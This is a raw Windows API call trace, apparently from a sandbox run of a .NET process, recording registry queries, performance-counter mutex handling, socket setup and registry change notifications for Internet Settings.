	[0819.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86b878 | out: phkResult=0x1c86b878*=0x3bc) returned 0x0
	[0819.287] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c86b7fc, lpData=0x0, lpcbData=0x1c86b7f8*=0x0 | out: lpType=0x1c86b7fc*=0x1, lpData=0x0, lpcbData=0x1c86b7f8*=0xe) returned 0x0
	[0819.287] CoTaskMemAlloc (cb=0x12) returned 0x1b87d7b0
	[0819.287] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c86b7cc, lpData=0x1b87d7b0, lpcbData=0x1c86b7c8*=0xe | out: lpType=0x1c86b7cc*=0x1, lpData="Client", lpcbData=0x1c86b7c8*=0xe) returned 0x0
	[0819.287] CoTaskMemFree (pv=0x1b87d7b0) 
	[0819.287] RegCloseKey (hKey=0x3bc) returned 0x0
	[0820.340] CoTaskMemAlloc (cb=0xcd0) returned 0x1b8d5fc0
	[0820.340] RasEnumConnectionsW (in: param_1=0x1b8d5fc0, param_2=0x1c86d80c, param_3=0x1c86d808 | out: param_1=0x1b8d5fc0, param_2=0x1c86d80c, param_3=0x1c86d808) returned 0x0
	[0820.346] CoTaskMemFree (pv=0x1b8d5fc0) 
	[0820.353] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c86d618 | out: lpWSAData=0x1c86d618) returned 0
	[0820.363] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0820.372] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0820.372] closesocket (s=0x408) returned 0
	[0822.130] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0822.132] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0822.132] closesocket (s=0x408) returned 0
	[0822.141] GetCurrentProcess () returned 0xffffffffffffffff
	[0822.141] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86ce98 | out: TokenHandle=0x1c86ce98*=0x408) returned 1
	[0822.153] GetCurrentProcess () returned 0xffffffffffffffff
	[0822.154] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86ce98 | out: TokenHandle=0x1c86ce98*=0x40c) returned 1
	[0824.591] GetCurrentProcessId () returned 0xcb0
	[0824.607] CoTaskMemAlloc (cb=0x204) returned 0xf4cb0
	[0824.607] GetComputerNameW (in: lpBuffer=0xf4cb0, nSize=0x2fee730 | out: lpBuffer="XDUWTFONO", nSize=0x2fee730) returned 1
	[0824.607] CoTaskMemFree (pv=0xf4cb0) 
	[0824.608] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d378 | out: phkResult=0x1c86d378*=0x410) returned 0x0
	[0824.608] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c86d2fc, lpData=0x0, lpcbData=0x1c86d2f8*=0x0 | out: lpType=0x1c86d2fc*=0x1, lpData=0x0, lpcbData=0x1c86d2f8*=0x1c) returned 0x0
	[0824.609] CoTaskMemAlloc (cb=0x20) returned 0x1b8b8d70
	[0824.609] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c86d2cc, lpData=0x1b8b8d70, lpcbData=0x1c86d2c8*=0x1c | out: lpType=0x1c86d2cc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c86d2c8*=0x1c) returned 0x0
	[0824.609] CoTaskMemFree (pv=0x1b8b8d70) 
	[0824.609] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c86d2fc, lpData=0x0, lpcbData=0x1c86d2f8*=0x0 | out: lpType=0x1c86d2fc*=0x4, lpData=0x0, lpcbData=0x1c86d2f8*=0x4) returned 0x0
	[0824.610] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c86d300, lpData=0x1c86d2fc, lpcbData=0x1c86d2f8*=0x4 | out: lpType=0x1c86d300*=0x4, lpData=0x1c86d2fc*=0x1, lpcbData=0x1c86d2f8*=0x4) returned 0x0
	[0824.610] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c86d2fc, lpData=0x0, lpcbData=0x1c86d2f8*=0x0 | out: lpType=0x1c86d2fc*=0x4, lpData=0x0, lpcbData=0x1c86d2f8*=0x4) returned 0x0
	[0824.610] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c86d300, lpData=0x1c86d2fc, lpcbData=0x1c86d2f8*=0x4 | out: lpType=0x1c86d300*=0x4, lpData=0x1c86d2fc*=0x137a, lpcbData=0x1c86d2f8*=0x4) returned 0x0
	[0824.610] RegCloseKey (hKey=0x410) returned 0x0
	[0824.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d338 | out: phkResult=0x1c86d338*=0x410) returned 0x0
	[0824.613] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c86d2bc, lpData=0x0, lpcbData=0x1c86d2b8*=0x0 | out: lpType=0x1c86d2bc*=0x4, lpData=0x0, lpcbData=0x1c86d2b8*=0x4) returned 0x0
	[0824.613] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c86d2c0, lpData=0x1c86d2bc, lpcbData=0x1c86d2b8*=0x4 | out: lpType=0x1c86d2c0*=0x4, lpData=0x1c86d2bc*=0x3, lpcbData=0x1c86d2b8*=0x4) returned 0x0
	[0824.614] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c86d2bc, lpData=0x0, lpcbData=0x1c86d2b8*=0x0 | out: lpType=0x1c86d2bc*=0x4, lpData=0x0, lpcbData=0x1c86d2b8*=0x4) returned 0x0
	[0824.614] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c86d2c0, lpData=0x1c86d2bc, lpcbData=0x1c86d2b8*=0x4 | out: lpType=0x1c86d2c0*=0x4, lpData=0x1c86d2bc*=0x20000, lpcbData=0x1c86d2b8*=0x4) returned 0x0
	[0824.614] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c86d2bc, lpData=0x0, lpcbData=0x1c86d2b8*=0x0 | out: lpType=0x1c86d2bc*=0x3, lpData=0x0, lpcbData=0x1c86d2b8*=0xaa) returned 0x0
	[0824.614] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c86d2bc, lpData=0x2ff1a20, lpcbData=0x1c86d2b8*=0xaa | out: lpType=0x1c86d2bc*=0x3, lpData=0x2ff1a20*, lpcbData=0x1c86d2b8*=0xaa) returned 0x0
	[0824.618] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0827.741] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c86d270, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0827.743] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418
	[0827.745] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2910000
	[0827.750] VirtualQuery (in: lpAddress=0x2910000, lpBuffer=0x1c86d268, dwLength=0x30 | out: lpBuffer=0x1c86d268*(BaseAddress=0x2910000, AllocationBase=0x2910000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0827.753] LocalFree (hMem=0x106dd0) returned 0x0
	[0827.754] RegCloseKey (hKey=0x410) returned 0x0
	[0827.761] GetVersionExW (in: lpVersionInformation=0x1c86c240*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c86c240*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0827.762] GetVersionExW (in: lpVersionInformation=0x1c86c210*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c86c210*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0827.764] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff26f0, cbSid=0x1c86d250 | out: pSid=0x2ff26f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d250) returned 1
	[0827.767] CreateMutexW (lpMutexAttributes=0x2ff28f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0827.768] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0827.772] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x102
	[0833.516] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.517] GetCurrentProcessId () returned 0xcb0
	[0833.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x41c
	[0833.519] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d160, lpExitTime=0x1c86d158, lpKernelTime=0x1c86d150, lpUserTime=0x1c86d148 | out: lpCreationTime=0x1c86d160, lpExitTime=0x1c86d158, lpKernelTime=0x1c86d150, lpUserTime=0x1c86d148) returned 1
	[0833.519] CloseHandle (hObject=0x41c) returned 1
	[0833.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x41c
	[0833.520] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.520] CloseHandle (hObject=0x41c) returned 1
	[0833.520] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x41c
	[0833.521] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.521] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.522] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.524] CloseHandle (hObject=0x420) returned 1
	[0833.524] CloseHandle (hObject=0x41c) returned 1
	[0833.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x41c
	[0833.524] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.524] CloseHandle (hObject=0x41c) returned 1
	[0833.525] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x41c
	[0833.525] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.525] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.525] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.525] CloseHandle (hObject=0x420) returned 1
	[0833.525] CloseHandle (hObject=0x41c) returned 1
	[0833.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0833.526] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.526] CloseHandle (hObject=0x41c) returned 1
	[0833.526] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0833.526] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.526] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.526] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.526] CloseHandle (hObject=0x420) returned 1
	[0833.527] CloseHandle (hObject=0x41c) returned 1
	[0833.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0833.527] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.528] CloseHandle (hObject=0x41c) returned 1
	[0833.528] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0833.528] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.528] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.528] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.528] CloseHandle (hObject=0x420) returned 1
	[0833.528] CloseHandle (hObject=0x41c) returned 1
	[0833.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0833.529] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.529] CloseHandle (hObject=0x41c) returned 1
	[0833.529] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0833.529] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.529] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.529] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.529] CloseHandle (hObject=0x420) returned 1
	[0833.530] CloseHandle (hObject=0x41c) returned 1
	[0833.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0833.530] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8 | out: lpCreationTime=0x1c86d1f0, lpExitTime=0x1c86d1e8, lpKernelTime=0x1c86d1e0, lpUserTime=0x1c86d1d8) returned 1
	[0833.530] CloseHandle (hObject=0x41c) returned 1
	[0833.530] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0833.530] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.530] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.530] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d148*=0x420) returned 1
	[0833.530] CloseHandle (hObject=0x420) returned 1
	[0833.531] CloseHandle (hObject=0x41c) returned 1
	[0833.532] ReleaseMutex (hMutex=0x410) returned 1
	[0833.532] CloseHandle (hObject=0x410) returned 1
	[0833.533] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff3a88, cbSid=0x1c86d250 | out: pSid=0x2ff3a88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d250) returned 1
	[0833.533] CreateMutexW (lpMutexAttributes=0x2ff3c40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.533] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.534] ReleaseMutex (hMutex=0x410) returned 1
	[0833.534] CloseHandle (hObject=0x410) returned 1
	[0833.534] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff48b0, cbSid=0x1c86d250 | out: pSid=0x2ff48b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d250) returned 1
	[0833.535] CreateMutexW (lpMutexAttributes=0x2ff4a68, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.535] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.535] ReleaseMutex (hMutex=0x410) returned 1
	[0833.535] CloseHandle (hObject=0x410) returned 1
	[0833.536] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff56e8, cbSid=0x1c86d250 | out: pSid=0x2ff56e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d250) returned 1
	[0833.536] CreateMutexW (lpMutexAttributes=0x2ff58a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.536] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.537] ReleaseMutex (hMutex=0x410) returned 1
	[0833.537] CloseHandle (hObject=0x410) returned 1
	[0833.537] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff6518, cbSid=0x1c86d250 | out: pSid=0x2ff6518*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d250) returned 1
	[0833.537] CreateMutexW (lpMutexAttributes=0x2ff66d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.537] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.538] ReleaseMutex (hMutex=0x410) returned 1
	[0833.538] CloseHandle (hObject=0x410) returned 1
	[0833.541] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff7348, cbSid=0x1c86d200 | out: pSid=0x2ff7348*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d200) returned 1
	[0833.541] CreateMutexW (lpMutexAttributes=0x2ff7500, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.541] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.542] ReleaseMutex (hMutex=0x410) returned 1
	[0833.542] CloseHandle (hObject=0x410) returned 1
	[0833.542] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff8168, cbSid=0x1c86d200 | out: pSid=0x2ff8168*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d200) returned 1
	[0833.543] CreateMutexW (lpMutexAttributes=0x2ff8320, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.543] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.543] ReleaseMutex (hMutex=0x410) returned 1
	[0833.544] CloseHandle (hObject=0x410) returned 1
	[0833.544] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff8f80, cbSid=0x1c86d200 | out: pSid=0x2ff8f80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d200) returned 1
	[0833.544] CreateMutexW (lpMutexAttributes=0x2ff9138, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.544] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.545] ReleaseMutex (hMutex=0x410) returned 1
	[0833.545] CloseHandle (hObject=0x410) returned 1
	[0833.545] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ff9da8, cbSid=0x1c86d200 | out: pSid=0x2ff9da8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d200) returned 1
	[0833.545] CreateMutexW (lpMutexAttributes=0x2ff9f60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.545] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.549] ReleaseMutex (hMutex=0x410) returned 1
	[0833.549] CloseHandle (hObject=0x410) returned 1
	[0833.550] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ffabc8, cbSid=0x1c86d200 | out: pSid=0x2ffabc8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d200) returned 1
	[0833.550] CreateMutexW (lpMutexAttributes=0x2ffad80, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0833.550] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0833.551] ReleaseMutex (hMutex=0x410) returned 1
	[0833.551] CloseHandle (hObject=0x410) returned 1
	[0833.553] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410
	[0833.554] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0833.555] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x1c86d838 | out: argp=0x1c86d838) returned 0
	[0833.555] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0833.555] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0833.555] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x1c86d838 | out: argp=0x1c86d838) returned 0
	[0833.556] WSAIoctl (in: s=0x410, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d7b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d7b0, lpOverlapped=0x0) returned -1
	[0833.557] CoTaskMemAlloc (cb=0x204) returned 0xf4aa0
	[0833.557] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xf4aa0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0833.558] CoTaskMemFree (pv=0xf4aa0) 
	[0835.602] WSAEventSelect (s=0x410, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0835.603] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d7b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d7b0, lpOverlapped=0x0) returned -1
	[0835.603] CoTaskMemAlloc (cb=0x204) returned 0xf4aa0
	[0835.603] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xf4aa0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0835.603] CoTaskMemFree (pv=0xf4aa0) 
	[0835.603] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0
	[0835.603] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428
	[0835.604] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x428, param_3=0x3) returned 0x0
	[0835.610] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c86d8f0 | out: phkResult=0x1c86d8f0*=0x440) returned 0x0
	[0835.612] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d7d8 | out: phkResult=0x1c86d7d8*=0x444) returned 0x0
	[0835.612] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0835.613] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0835.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d800 | out: phkResult=0x1c86d800*=0x44c) returned 0x0
	[0835.614] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0835.614] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0835.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d800 | out: phkResult=0x1c86d800*=0x454) returned 0x0
	[0835.614] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458
	[0835.614] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0
	[0835.614] GetCurrentProcess () returned 0xffffffffffffffff
	[0835.615] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d768 | out: TokenHandle=0x1c86d768*=0x45c) returned 1
	[0835.624] GetCurrentProcess () returned 0xffffffffffffffff
	[0835.624] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86cf38 | out: TokenHandle=0x1c86cf38*=0x460) returned 1
